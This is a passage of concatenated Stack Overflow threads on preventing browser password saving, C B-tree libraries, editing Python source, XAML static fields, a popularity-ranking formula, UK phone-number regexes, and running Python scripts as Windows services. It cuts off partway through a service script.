function checkAndSubmit(e) {
    if (e.keyCode == 13) {
        validateAndLogin();
    }
}
Good luck!!!
A: Markus raised a great point. I decided to look up the autocomplete attribute and got the following: The only downside to using this attribute is that it is not standard (it works in IE and Mozilla browsers), and would cause XHTML validation to fail. I think this is a case where it's reasonable to break validation however. (source) So I would have to say that although it doesn't work 100% across the board, it is handled in the major browsers, so it's a great solution.
A: The real problem is much deeper than just adding attributes to your HTML - this is a common security concern, and that's why people invented hardware keys and other crazy things for security. Imagine you have autocomplete="off" perfectly working in all browsers. Would that help with security? Of course not. Users will write down their passwords in textbooks, on stickers attached to their monitor where every office visitor can see them, save them to text files on the desktop and so on. Generally, the web application and the web developer aren't responsible in any way for end-user security. Only end-users can protect themselves. Ideally, they MUST keep all passwords in their head and use password-reset functionality (or contact the administrator) in case they forget one. Otherwise there will always be a risk that a password can be seen and stolen somehow. So either you have some crazy security policy with hardware keys (like some banks offer for Internet banking, which basically employs two-factor authentication) or NO SECURITY basically. Well, this is a bit exaggerated, of course. It's important to understand what you are trying to protect against:
* *Unauthorised access. A simple login form is basically enough. There are sometimes additional measures taken, like random security questions, CAPTCHAs, password hardening, etc.
*Credential sniffing.
HTTPS is A MUST if people access your web application from public Wi-Fi hotspots, etc. Note that even with HTTPS, your users need to change their passwords regularly.
*Insider attack. There are too many examples of these, starting from simple stealing of your passwords from the browser or from those you have written down somewhere on your desk (no IT skills required) and ending with session forging and intercepting local network traffic (even encrypted), and then accessing the web application just as if it were another end-user.
In this particular post, I can see inadequate requirements put on the developer, which they will never be able to resolve due to the nature of the problem: end-user security. My subjective view is that the developer should basically say NO and point out the requirement problem rather than waste time on such tasks, honestly. This does not make your system more secure; it will rather lead to the sticker-on-monitor cases. Unfortunately, some bosses hear only what they want to hear. However, if I were you, I would try to explain where the actual problem is coming from, and that autocomplete="off" would not resolve it unless it forces users to keep all their passwords exclusively in their head! The developer cannot protect users completely on their end; users need to know how to use the system without exposing their sensitive/secure information, and this goes far beyond authentication.
A: I tried autocomplete="off" as above without any success. If you are using AngularJS, my recommendation is to go with a button and ng-click.
<button type="button" class="" ng-click="vm.login()" />
This already has an accepted answer; I'm adding this so that if someone can't solve the problem with the accepted answer, they can go with my mechanism. Thanks for the question and the answers.
A: One way I know is to use (for instance) JavaScript to copy the value out of the password field before submitting the form. The main problem with this is that the solution is tied to JavaScript. Then again, if it can be tied to JavaScript you might as well hash the password on the client-side before sending a request to the server.
A: Facing the same HIPAA issue, I found a relatively easy solution:
* *Create a hidden password field with the field name as an array. <input type="password" name="password[]" style="display:none" />
*Use the same array for the actual password field. <input type="password" name="password[]" />
The browser (Chrome) may prompt you to "Save password", but regardless of whether the user selects save, the next time they log in the password will auto-populate the hidden password field - the zero slot in the array - leaving the 1st slot blank. I tried defining the array, such as "password[part2]", but it still remembered. I think an unindexed array throws it off, because it has no choice but to drop the value in the first spot. Then you use your programming language of choice to access the array, PHP for example: echo $_POST['password'][1];
A: Since most of the autocomplete suggestions, including the accepted answer, don't work in today's web browsers (i.e. web browser password managers ignore autocomplete), a more novel solution is to swap between password and text types and make the background color match the text color when the field is a plain text field, which continues to hide the password while being a real password field when the user (or a program like KeePass) is entering a password. Browsers don't ask to save passwords that are stored in plain text fields.
The advantage of this approach is that it allows for progressive enhancement and therefore doesn't require JavaScript for a field to function as a normal password field (you could also start with a plain text field instead and apply the same approach, but that's not really HIPAA PHI/PII-compliant). Nor does this approach depend on hidden forms/fields, which might not necessarily be sent to the server (because they are hidden), and some of those tricks also don't work in several modern browsers. jQuery plugin: https://github.com/cubiclesoft/php-flexforms-modules/blob/master/password-manager/jquery.stoppasswordmanager.js Relevant source code from the above link:
(function($) {
    $.fn.StopPasswordManager = function() {
        return this.each(function() {
            var $this = $(this);

            $this.addClass('no-print');
            $this.attr('data-background-color', $this.css('background-color'));
            $this.css('background-color', $this.css('color'));
            $this.attr('type', 'text');
            $this.attr('autocomplete', 'off');

            $this.focus(function() {
                $this.attr('type', 'password');
                $this.css('background-color', $this.attr('data-background-color'));
            });

            $this.blur(function() {
                $this.css('background-color', $this.css('color'));
                $this.attr('type', 'text');
                $this[0].selectionStart = $this[0].selectionEnd;
            });

            $this.on('keydown', function(e) {
                if (e.keyCode == 13) {
                    $this.css('background-color', $this.css('color'));
                    $this.attr('type', 'text');
                    $this[0].selectionStart = $this[0].selectionEnd;
                }
            });
        });
    }
}(jQuery));
Demo: https://barebonescms.com/demos/admin_pack/admin.php Click "Add Entry" in the menu and then scroll to the bottom of the page to "Module: Stop Password Manager". Disclaimer: While this approach works for sighted individuals, there might be issues with screen reader software. For example, a screen reader might read the user's password out loud because it sees a plain text field. There might also be other unforeseen consequences of using the above plugin. Altering built-in web browser functionality should be done sparingly, with testing of a wide variety of conditions and edge cases.
A: <input type="text" id="mPassword" required="required" title="Valid password required" autocomplete="off" list="autocompleteOff" readonly onfocus="this.removeAttribute('readonly');" style="text-security:disc; -webkit-text-security:disc;" oncopy="return false;" onpaste="return false;"/>
A: IMHO, the best way is to randomize the name of the input field that has type=password. Use a prefix of "pwd" and then a random number. Create the field dynamically and present the form to the user. Your log-in form will look like...
<form>
    <input type=password id=pwd67584 ...>
    <input type=text id=username ...>
    <input type=submit>
</form>
Then, on the server side, when you analyze the form posted by the client, catch the field with a name that starts with "pwd" and use it as 'password'.
A: I think putting autocomplete="off" does not help at all; I have an alternative solution. <input type="text" name="preventAutoPass" id="preventAutoPass" style="display:none" /> Add this before your password input. E.g.: <input type="text" name="txtUserName" id="txtUserName" /> <input type="text" name="preventAutoPass" id="preventAutoPass" style="display:none" /> <input type="password" name="txtPass" id="txtPass" autocomplete="off" /> This does not prevent the browser from asking to save the password, but it prevents the password from being filled in.
Cheers.
A: autocomplete="off" works for most modern browsers, but another method I used that worked successfully with Epiphany (a WebKit-powered browser for GNOME) is to store a randomly generated prefix in session state (or a hidden field; I happened to have a suitable variable in session state already), and use this to alter the name of the fields. Epiphany still wants to save the password, but when going back to the form it won't populate the fields.
A: I haven't had any issues using this method: use autocomplete="off", add a hidden password field and then another non-hidden one. The browser tries to auto-complete the hidden one if it doesn't respect autocomplete="off".
A: Another solution is to make the POST using a hidden form where all the inputs are of type hidden. The visible form will use inputs of type "password". The latter form will never be submitted, and so the browser can't intercept the login operation at all.
A: Since Internet Explorer 11 no longer supports autocomplete="off" for input type="password" fields (hopefully no other browsers will follow their lead), the cleanest approach (at the time of writing) seems to be making users submit their username and password on different pages, i.e. the user enters their username and submits, then enters their password and submits. The Bank Of America and HSBC Bank websites are using this, too. Because the browser is unable to associate the password with a username, it will not offer to store passwords. This approach works in all major browsers (at the time of writing) and will function properly without the use of JavaScript. The downsides are that it would be more troublesome for the user, and would take 2 postbacks for a login action instead of one, so it really depends on how secure your website needs to be. Update: As mentioned in this comment by Gregory, Firefox will be following IE11's lead and ignore autocomplete="off" for password fields.
A: Is there a way for a site to tell the browser not to offer to remember passwords? The website tells the browser that it is a password by using <input type="password">. So if you must do this from a website perspective then you would have to change that. (Obviously I don't recommend this.) The best solution would be to have the user configure their browser so it won't remember passwords.
A: If you do not want to trust the autocomplete flag, you can make sure that the user types in the box by using the onchange event. The code below is a simple HTML form. The hidden form element password_edited starts out set to 0. When the value of password is changed, the JavaScript at the top (the pw_edited function) changes the value to 1. When the button is pressed, it checks the value before submitting the form. That way, even if the browser ignores you and autocompletes the field, the user cannot pass the login page without typing in the password field. Also, make sure to blank the password field when focus is set. Otherwise, you can add a character at the end, then go back and remove it to trick the system. I recommend adding autocomplete="off" to the password field in addition, but this example shows how the backup code works.
<html>
<head>
<script>
function pw_edited() {
    document.this_form.password_edited.value = 1;
}
function pw_blank() {
    document.this_form.password.value = "";
}
function submitf() {
    if(document.this_form.password_edited.value < 1) {
        alert("Please Enter Your Password!");
    }
    else {
        document.this_form.submit();
    }
}
</script>
</head>
<body>
<form name="this_form" method="post" action="../../cgi-bin/yourscript.cgi?login">
    <div style="padding-left:25px;">
        <p>
            <label>User:</label>
            <input name="user_name" type="text" class="input" value="" size="30" maxlength="60">
        </p>
        <p>
            <label>Password:</label>
            <input name="password" type="password" class="input" size="20" value="" maxlength="50" onfocus="pw_blank();" onchange="pw_edited();">
        </p>
        <p>
            <span id="error_msg"></span>
        </p>
        <p>
            <input type="hidden" name="password_edited" value="0">
            <input name="submitform" type="button" class="button" value="Login" onclick="return submitf();">
        </p>
    </div>
</form>
</body>
</html>
A: autocomplete="off" does not work for disabling the password manager in Firefox 31, and most likely not in some earlier versions either. Check out the discussion at Mozilla about this issue: https://bugzilla.mozilla.org/show_bug.cgi?id=956906 We wanted to use a second password field to enter a one-time password generated by a token. Now we are using a text input instead of a password input. :-(
A: I was given a similar task to disable the auto-filling of login names and passwords by the browser; after a lot of trial and error I found the below solution to be optimal. Just add the below controls before your original controls.
<input type="text" style="display:none">
<input type="text" name="OriginalLoginTextBox">
<input type="password" style="display:none">
<input type="text" name="OriginalPasswordTextBox">
This is working fine for IE11 and Chrome 44.0.2403.107
{ "language": "en", "url": "https://stackoverflow.com/questions/32369", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "457" }
Q: What is a good open source B-tree implementation in C? I am looking for a lean and well-constructed open source implementation of a B-tree library written in C. It needs to be under a non-GPL license so that it can be used in a commercial application. Ideally, this library would support storing/manipulating the B-tree index as a disk file, so that large trees can be built using a configurable (i.e. minimal) RAM footprint. Note: Since there seemed to be some confusion, a Binary Tree and a B-Tree are not the same thing.
A: The author of the SQLite implementation has disclaimed copyright. If LGPL is okay, then maybe you could use GNUpdate's implementation?
A: If LGPL is ok, then Tokyo Cabinet might fit the bill. LGPL allows linking with a non-Free application, without adding any constraints on the distribution of the final product.
A: Check out QDBM: http://fallabs.com/qdbm/. It's LGPL (can be used in a commercial app), implements a disk-backed hash and/or B+ tree with arbitrary key/value pairs, and builds on a variety of platforms.
A: Attractive Chaos implements kbtree.h. It's an efficient B-tree library.
A: I came across this - The WB B-Tree Database for SCM, Java, C#, and C - that's a GNU package.
A: Maybe you can consider Berkeley DB. It uses a B-tree internally.
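To give a rough idea of what the Berkeley DB route looks like from C, here is a minimal sketch of the classic db_create/DB->open API with a B-tree-backed file (error handling is collapsed to simple checks, the file name is a placeholder, and you would link with -ldb):
#include <stdio.h>
#include <string.h>
#include <db.h>

int main(void)
{
    DB *dbp;
    DBT key, data;
    char k[] = "alpha", v[] = "first";

    /* Create a handle and open a B-tree-backed database file on disk. */
    if (db_create(&dbp, NULL, 0) != 0)
        return 1;
    if (dbp->open(dbp, NULL, "index.db", NULL, DB_BTREE, DB_CREATE, 0664) != 0)
        return 1;

    /* DBTs must be zeroed before use. */
    memset(&key, 0, sizeof(key));
    memset(&data, 0, sizeof(data));
    key.data = k;   key.size = sizeof(k) - 1;
    data.data = v;  data.size = sizeof(v) - 1;

    /* Insert a key/value pair; the tree lives in the file, not in RAM. */
    dbp->put(dbp, NULL, &key, &data, 0);

    dbp->close(dbp, 0);
    return 0;
}
Do check the license terms against the non-GPL requirement, though: Berkeley DB's license carries its own redistribution conditions for commercial use.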
{ "language": "en", "url": "https://stackoverflow.com/questions/32376", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "34" }
Q: Programmatically editing Python source This is something that I think would be very useful. Basically, I'd like there to be a way to edit Python source programmatically without requiring human intervention. There are a couple of things I would like to do with this: * *Edit the configuration of Python apps that use source modules for configuration. *Set up a "template" so that I can customize a Python source file on the fly. This way, I can set up a "project" system on an open source app I'm working on and allow certain files to be customized. I could probably write something that can do this myself, but I can see that opening up a lot of "devil's in the details" type issues. Are there any ways to do this currently, or am I just going to have to bite the bullet and implement it myself?
A: Python's standard library provides pretty good facilities for working with Python source; note the tokenize and parser modules.
A: I had the same issue, and I simply opened the file, did some replacements, then reloaded the file in the Python interpreter. This works fine and is easy to do. Otherwise, AFAIK, you have to use some conf objects.
A: Most of these kinds of things can be determined programmatically in Python, using modules like sys, os, and the special __file__ identifier, which tells you where you are in the filesystem path. It's important to keep in mind that when a module is first imported it will execute everything in the file scope, which is important for developing system-dependent behaviors. For example, the os module basically determines what operating system you're using on import and then adjusts its implementation accordingly (by importing another module corresponding to Linux, OSX, Windows, etc.). There's a lot of power in this feature and something along these lines is probably what you're looking for. :) [Edit] I've also used socket.gethostname() in some rare, hackish instances. ;)
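Following up on the tokenize/parser pointer above: the standard-library ast module also parses source into a tree that you can rewrite programmatically, which fits the configuration use case. A minimal sketch (the DEBUG variable is illustrative; ast.unparse needs Python 3.9+, so on older versions you would regenerate the source some other way):
import ast

source = "DEBUG = False\nPORT = 8000\n"

tree = ast.parse(source)

# Walk the module body and rewrite the value of the DEBUG assignment.
for node in tree.body:
    if isinstance(node, ast.Assign):
        target = node.targets[0]
        if isinstance(target, ast.Name) and target.id == "DEBUG":
            node.value = ast.Constant(value=True)

print(ast.unparse(tree))  # DEBUG = True, PORT = 8000
This avoids fragile string replacement: you edit the parsed structure and regenerate valid source.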
{ "language": "en", "url": "https://stackoverflow.com/questions/32385", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "10" }
Q: Accessing static fields in XAML How does one go about referencing a class's static properties in XAML? In other words, I want to do something like this:
class BaseThingy {
    public static readonly Style BaseStyle;
    ...
}
<ResourceDictionary ...>
    <Style BasedOn="BaseThingy.Style" TargetType="BaseThingy" />
</ResourceDictionary>
What is the syntax to do this in the BasedOn? I assumed it would involve using StaticResource to some degree, but I haven't gotten it to work for me.
A: Use the x:Static markup extension:
<ResourceDictionary ...
    xmlns:local="clr-namespace:Namespace.Where.Your.BaseThingy.Class.Is.Defined"
>
    <Style BasedOn="{x:Static local:BaseThingy.BaseStyle}" TargetType="BaseThingy" />
</ResourceDictionary>
{ "language": "en", "url": "https://stackoverflow.com/questions/32395", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "4" }
Q: Popularity algorithm On SO 18 Joel mentioned an algorithm that would rank items based on their age and popularity and it's based on gravity. Could someone post this? C# would be lovely, but really any language (well, I can't do LISP) would be fine.
A: (Image: diagram of Reddit's story-ranking algorithm; the original image was at http://www.mt-soft.com.ar/wordpress/wp-content/plugins/wp-o-matic/cache/0ad4d_reddit_cf_algorithm.png)
A: My understanding is that it is approximately the following, from another Jeff Atwood post:
t = (time of entry post) - (Dec 8, 2005)
x = upvotes - downvotes
y = {1 if x > 0, 0 if x = 0, -1 if x < 0}
z = {1 if x < 1, otherwise x}
score = log(z) + (y * t)/45000
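A direct transcription of that formula into C# (a sketch: Reddit's published version takes the logarithm base 10 and measures t in seconds since the Dec 8, 2005 epoch, which is assumed here):
using System;

static class Ranking
{
    static readonly DateTime Epoch = new DateTime(2005, 12, 8, 0, 0, 0, DateTimeKind.Utc);

    public static double HotScore(int upvotes, int downvotes, DateTime postedUtc)
    {
        double t = (postedUtc - Epoch).TotalSeconds; // age term: newer posts score higher
        int x = upvotes - downvotes;
        int y = Math.Sign(x);                        // 1, 0 or -1
        double z = Math.Max(x, 1);                   // clamp so the log is defined
        return Math.Log10(z) + (y * t) / 45000.0;
    }
}
The log term means the first few votes count far more than later ones, while the t/45000 term steadily lifts newer items above older ones.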
{ "language": "en", "url": "https://stackoverflow.com/questions/32397", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "14" }
Q: Validate a UK phone number How do I validate a UK phone number in C# using a regex?
A: The regex in the accepted answer does not match all valid UK numbers, as it is too restrictive (additional number ranges have been opened up in the meantime, such as 0203, which it sees as invalid). UK phone numbers follow fairly simple rules: * *They can be either 10 or 11 digits long (with the exception of some special numbers, but you're unlikely to need to validate those) *They consist of an area code followed by a local number. The area code varies in length between three and five digits, and the local portion of the number takes up the remaining length of the 10 or 11 digits. For all practical purposes, no-one ever quotes just the local portion of their number, so you can ignore the distinction for now, except for how it affects formatting. *They start with zero. *The second digit can be anything. Currently no valid numbers start with 04 or 06, but there's nothing stopping these ranges coming into use in the future. (03 has recently been brought into use) *They can be formatted with a set of brackets and with spaces (one or more, in varying positions), but those are all entirely optional. Therefore, a basic working expression for UK phone numbers could look like this: /^\(?0( *\d\)?){9,10}$/ This will check for 10 or 11 digit numbers, starting with a zero, with formatting spaces between any of the digits, and optionally a set of brackets for the area code. (And yes, this would allow mismatched brackets, as I'm not checking that there's only one closing bracket. Enforcing this would make the expression a lot more complex, and I don't have time for this right now, but feel free to add this if you wish.) By the way, in case you want to do additional filtering, you might want to also note the following rules: * *Numbers starting 08, 09 and 070 are special price numbers, and would not generally be given as private numbers, so can be excluded if validating a private number. *07 numbers are mobile (except 070; see above) so can be excluded if you're specifically validating for a landline.
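To use that expression from C#, as the question asks, a minimal sketch looks like this (the pattern is the basic one above - apply the extra filtering rules if you need them; the sample numbers are made up):
using System;
using System.Text.RegularExpressions;

class UkPhoneValidator
{
    static readonly Regex UkPhone = new Regex(@"^\(?0( *\d\)?){9,10}$");

    static bool IsValidUkNumber(string input)
    {
        return UkPhone.IsMatch(input);
    }

    static void Main()
    {
        Console.WriteLine(IsValidUkNumber("(020) 7946 0123")); // True: 11 digits, brackets and spaces
        Console.WriteLine(IsValidUkNumber("12345"));           // False: does not start with 0
    }
}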
{ "language": "en", "url": "https://stackoverflow.com/questions/32401", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "6" }
Q: How do you run a Python script as a service in Windows? I am sketching the architecture for a set of programs that share various interrelated objects stored in a database. I want one of the programs to act as a service which provides a higher-level interface for operations on these objects, and the other programs to access the objects through that service. I am currently aiming for Python and the Django framework as the technologies to implement that service with. I'm pretty sure I can figure out how to daemonize the Python program in Linux. However, it is an optional spec item that the system should support Windows. I have little experience with Windows programming and no experience at all with Windows services. Is it possible to run a Python program as a Windows service (i.e. run it automatically without user login)? I won't necessarily have to implement this part, but I need a rough idea of how it would be done in order to decide whether to design along these lines. Edit: Thanks for all the answers so far, they are quite comprehensive. I would like to know one more thing: How is Windows aware of my service? Can I manage it with the native Windows utilities? What is the equivalent of putting a start/stop script in /etc/init.d?
A: The simplest way is to use the NSSM - the Non-Sucking Service Manager. Just download and unzip to a location of your choosing. It's a self-contained utility, around 300KB (much less than installing the entire pywin32 suite just for this purpose) and no "installation" is needed. The zip contains a 64-bit and a 32-bit version of the utility. Either should work well on current systems (you can use the 32-bit version to manage services on 64-bit systems).
GUI approach
1 - Install the Python program as a service. Open a Win prompt as admin:
c:\>nssm.exe install WinService
2 - On NSSM's GUI console:
path: C:\Python27\python.exe
Startup directory: C:\Python27
Arguments: c:\WinService.py
3 - Check the created service in services.msc
Scripting approach (no GUI)
This is handy if your service should be part of an automated, non-interactive procedure that may be beyond your control, such as a batch or installer script. It is assumed that the commands are executed with administrative privileges. For convenience the commands are described here by simply referring to the utility as nssm.exe. It is advisable, however, to refer to it more explicitly in scripting with its full path c:\path\to\nssm.exe, since it's a self-contained executable that may be located in a private path that the system is not aware of.
1. Install the service
You must specify a name for the service, the path to the proper Python executable, and the path to the script:
nssm.exe install ProjectService "c:\path\to\python.exe" "c:\path\to\project\app\main.py"
More explicitly:
nssm.exe install ProjectService
nssm.exe set ProjectService Application "c:\path\to\python.exe"
nssm.exe set ProjectService AppParameters "c:\path\to\project\app\main.py"
Alternatively you may want your Python app to be started as a Python module. One easy approach is to tell nssm that it needs to change to the proper starting directory, as you would do yourself when launching from a command shell:
nssm.exe install ProjectService "c:\path\to\python.exe" "-m app.main"
nssm.exe set ProjectService AppDirectory "c:\path\to\project"
This approach works well with virtual environments and self-contained (embedded) Python installs. Just make sure to have properly resolved any path issues in those environments with the usual methods.
nssm also has a way to set environment variables (e.g. PYTHONPATH) if needed, and can also launch batch scripts. 2. To start the service nssm.exe start ProjectService 3. To stop the service nssm.exe stop ProjectService 4. To remove the service, specify the confirm parameter to skip the interactive confirmation. nssm.exe remove ProjectService confirm A: pysc: Service Control Manager on Python Example script to run as a service, taken from pythonhosted.org: from xmlrpc.server import SimpleXMLRPCServer from pysc import event_stop class TestServer: def echo(self, msg): return msg if __name__ == '__main__': server = SimpleXMLRPCServer(('127.0.0.1', 9001)) @event_stop def stop(): server.server_close() server.register_instance(TestServer()) server.serve_forever() Create and start service import os import sys from xmlrpc.client import ServerProxy import pysc if __name__ == '__main__': service_name = 'test_xmlrpc_server' script_path = os.path.join( os.path.dirname(__file__), 'xmlrpc_server.py' ) pysc.create( service_name=service_name, cmd=[sys.executable, script_path] ) pysc.start(service_name) client = ServerProxy('http://127.0.0.1:9001') print(client.echo('test scm')) Stop and delete service import pysc service_name = 'test_xmlrpc_server' pysc.stop(service_name) pysc.delete(service_name) pip install pysc A: NSSM in Python 3+ (I converted my .py file to .exe with pyinstaller) nssm: as said before * *run nssm install {ServiceName} *On NSSM's console: path: path\to\your\program.exe Startup directory: path\to\your\ #same as the path but without your program.exe Arguments: empty If you don't want to convert your project to .exe * *create a .bat file with python {{your python.py file name}} *and set the path to the .bat file A: Although I upvoted the chosen answer a couple of weeks back, in the meantime I struggled a lot more with this topic. It feels like having a special Python installation and using special modules to run a script as a service is simply the wrong way. What about portability and such? I stumbled across the wonderful Non-sucking Service Manager, which made it really simple and sane to deal with Windows Services. I figured since I could pass options to an installed service, I could just as well select my Python executable and pass my script as an option. I have not yet tried this solution, but I will do so right now and update this post along the process. I am also interested in using virtualenvs on Windows, so I might come up with a tutorial sooner or later and link to it here. A: I started hosting as a service with pywin32. Everything was fine, but I hit the problem that the service was not able to start within 30 seconds (the default timeout for Windows) on system startup. It was critical for me because Windows startup took place simultaneously on several virtual machines hosted on one physical machine, and the IO load was huge. The error messages were: Error 1053: The service did not respond to the start or control request in a timely fashion. Error 7009: Timeout (30000 milliseconds) waiting for the <ServiceName> service to connect. I fought a lot with pywin, but ended up using NSSM as proposed in this answer. It was very easy to migrate to it. A: The simplest way to achieve this is to use the native command sc.exe: sc create PythonApp binPath= "C:\Python34\Python.exe --C:\tmp\pythonscript.py" References: * *https://technet.microsoft.com/en-us/library/cc990289(v=ws.11).aspx *When creating a service with sc.exe how to pass in context parameters? A: Yes you can.
I do it using the pythoncom libraries that come included with ActivePython or can be installed with pywin32 (Python for Windows extensions). This is a basic skeleton for a simple service: import win32serviceutil import win32service import win32event import servicemanager import socket class AppServerSvc (win32serviceutil.ServiceFramework): _svc_name_ = "TestService" _svc_display_name_ = "Test Service" def __init__(self,args): win32serviceutil.ServiceFramework.__init__(self,args) self.hWaitStop = win32event.CreateEvent(None,0,0,None) socket.setdefaulttimeout(60) def SvcStop(self): self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING) win32event.SetEvent(self.hWaitStop) def SvcDoRun(self): servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE, servicemanager.PYS_SERVICE_STARTED, (self._svc_name_,'')) self.main() def main(self): pass if __name__ == '__main__': win32serviceutil.HandleCommandLine(AppServerSvc) Your code would go in the main() method, usually with some kind of infinite loop that might be interrupted by checking a flag, which you set in the SvcStop method. A: There are a couple of alternatives for installing virtually any Windows executable as a service. Method 1: Use instsrv and srvany from rktools.exe For Windows Home Server or Windows Server 2003 (works with WinXP too), the Windows Server 2003 Resource Kit Tools comes with utilities that can be used in tandem for this, called instsrv.exe and srvany.exe. See this Microsoft KB article KB137890 for details on how to use these utils. For Windows Home Server, there is a great user-friendly wrapper for these utilities aptly named "Any Service Installer". Method 2: Use ServiceInstaller for Windows NT There is another alternative using ServiceInstaller for Windows NT (downloadable here) with Python instructions available. Contrary to the name, it works with both Windows 2000 and Windows XP as well. Here are some instructions for how to install a Python script as a service. Installing a Python script Run ServiceInstaller to create a new service. (In this example, it is assumed that Python is installed at c:\python25) Service Name : PythonTest Display Name : PythonTest Startup : Manual (or whatever you like) Dependencies : (Leave blank or fill to fit your needs) Executable : c:\python25\python.exe Arguments : c:\path_to_your_python_script\test.py Working Directory : c:\path_to_your_python_script After installing, open the Control Panel's Services applet, select and start the PythonTest service. After my initial answer, I noticed there were closely related Q&A already posted on SO. See also: Can I run a Python script as a service (in Windows)? How? How do I make Windows aware of a service I have written in Python? A: A step-by-step explanation of how to make it work: 1 - First, create a Python file according to the basic skeleton mentioned above.
And save it to a path, for example: "c:\PythonFiles\AppServerSvc.py" import win32serviceutil import win32service import win32event import servicemanager import socket class AppServerSvc (win32serviceutil.ServiceFramework): _svc_name_ = "TestService" _svc_display_name_ = "Test Service" def __init__(self,args): win32serviceutil.ServiceFramework.__init__(self,args) self.hWaitStop = win32event.CreateEvent(None,0,0,None) socket.setdefaulttimeout(60) def SvcStop(self): self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING) win32event.SetEvent(self.hWaitStop) def SvcDoRun(self): servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE, servicemanager.PYS_SERVICE_STARTED, (self._svc_name_,'')) self.main() def main(self): # Your business logic or call to any class should be here # in this example it creates a test.txt and writes 'Test Service' to it once a day f = open('C:\\test.txt', 'a') rc = None while rc != win32event.WAIT_OBJECT_0: f.write('Test Service \n') f.flush() # block for 24*60*60 seconds and wait for a stop event # it is used for a one-day loop rc = win32event.WaitForSingleObject(self.hWaitStop, 24 * 60 * 60 * 1000) f.write('shut down \n') f.close() if __name__ == '__main__': win32serviceutil.HandleCommandLine(AppServerSvc) 2 - In this step we register our service. Run the command prompt as administrator and type: sc create TestService binpath= "C:\Python36\Python.exe c:\PythonFiles\AppServerSvc.py" DisplayName= "TestService" start= auto The first argument of binpath is the path of python.exe, and the second argument of binpath is the path of the Python file that we already created. Don't forget that you should put one space after every "=" sign. Then if everything is ok, you should see [SC] CreateService SUCCESS Your Python service is now installed as a Windows service. You can see it in the Service Manager and in the registry under: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TestService 3 - OK, now you can start your service in the Service Manager. You can run any Python file that provides this service skeleton. A: A complete pywin32 example using loop or subthread After working on this on and off for a few days, here is the answer I would have wished to find, using pywin32 to keep it nice and self-contained. This is complete working code for one loop-based and one thread-based solution. It may work on both Python 2 and 3, although I've only tested the latest version on 2.7 and Win7. The loop should be good for polling code, and the thread should work with more server-like code. It seems to work nicely with the waitress wsgi server, which does not have a standard way to shut down gracefully. I would also like to note that there seem to be loads of examples out there, like this, that are almost useful but in reality misleading, because they have cut and pasted other examples blindly. I could be wrong, but why create an event if you never wait for it? That said, I still feel I'm on somewhat shaky ground here, especially with regard to how clean the exit from the thread version is, but at least I believe there is nothing misleading here. To run it, simply copy the code to a file and follow the instructions. Update: use a simple flag to terminate the thread. The important bit is that "thread done" prints. For a more elaborate example exiting from an uncooperative server thread see my post about the waitress wsgi server.
# uncomment mainthread() or mainloop() call below # run without parameters to see HandleCommandLine options # install service with "install" and remove with "remove" # run with "debug" to see print statements # with "start" and "stop" watch for files to appear # check Windows Event Viewer for log messages import socket import sys import threading import time from random import randint from os import path import servicemanager import win32event import win32service import win32serviceutil # see http://timgolden.me.uk/pywin32-docs/contents.html for details def dummytask_once(msg='once'): fn = path.join(path.dirname(__file__), '%s_%s.txt' % (msg, randint(1, 10000))) with open(fn, 'w') as fh: print(fn) fh.write('') def dummytask_loop(): global do_run while do_run: dummytask_once(msg='loop') time.sleep(3) class MyThread(threading.Thread): def __init__(self): threading.Thread.__init__(self) def run(self): global do_run do_run = True print('thread start\n') dummytask_loop() print('thread done\n') def exit(self): global do_run do_run = False class SMWinservice(win32serviceutil.ServiceFramework): _svc_name_ = 'PyWinSvc' _svc_display_name_ = 'Python Windows Service' _svc_description_ = 'An example of a windows service in Python' @classmethod def parse_command_line(cls): win32serviceutil.HandleCommandLine(cls) def __init__(self, args): win32serviceutil.ServiceFramework.__init__(self, args) self.stopEvt = win32event.CreateEvent(None, 0, 0, None) # create generic event socket.setdefaulttimeout(60) def SvcStop(self): servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE, servicemanager.PYS_SERVICE_STOPPED, (self._svc_name_, '')) self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING) win32event.SetEvent(self.stopEvt) # raise event def SvcDoRun(self): servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE, servicemanager.PYS_SERVICE_STARTED, (self._svc_name_, '')) # UNCOMMENT ONE OF THESE # self.mainthread() # self.mainloop() # Wait for stopEvt indefinitely after starting thread. def mainthread(self): print('main start') self.server = MyThread() self.server.start() print('wait for win32event') win32event.WaitForSingleObject(self.stopEvt, win32event.INFINITE) self.server.exit() print('wait for thread') self.server.join() print('main done') # Wait for stopEvt event in loop. def mainloop(self): print('loop start') rc = None while rc != win32event.WAIT_OBJECT_0: dummytask_once() rc = win32event.WaitForSingleObject(self.stopEvt, 3000) print('loop done') if __name__ == '__main__': SMWinservice.parse_command_line() A: This answer is plagiarized from several sources on StackOverflow - most of them above, but I've forgotten the others - sorry. It's simple and scripts run "as is". For releases you test your script, then copy it to the server and stop/start the associated service. And it should work for all scripting languages (Python, Perl, node.js), plus batch scripts such as GitBash, PowerShell, even old DOS bat scripts. pyGlue is the glue that sits between Windows Services and your script. ''' A script to create a Windows Service, which, when started, will run an executable with the specified parameters. Optionally, you can also specify a startup directory. To use this script you MUST define (in class Service) 1. A name for your service (short - preferably no spaces) 2. A display name for your service (the name visible in Windows Services) 3. A description for your service (long details visible when you inspect the service in Windows Services) 4.
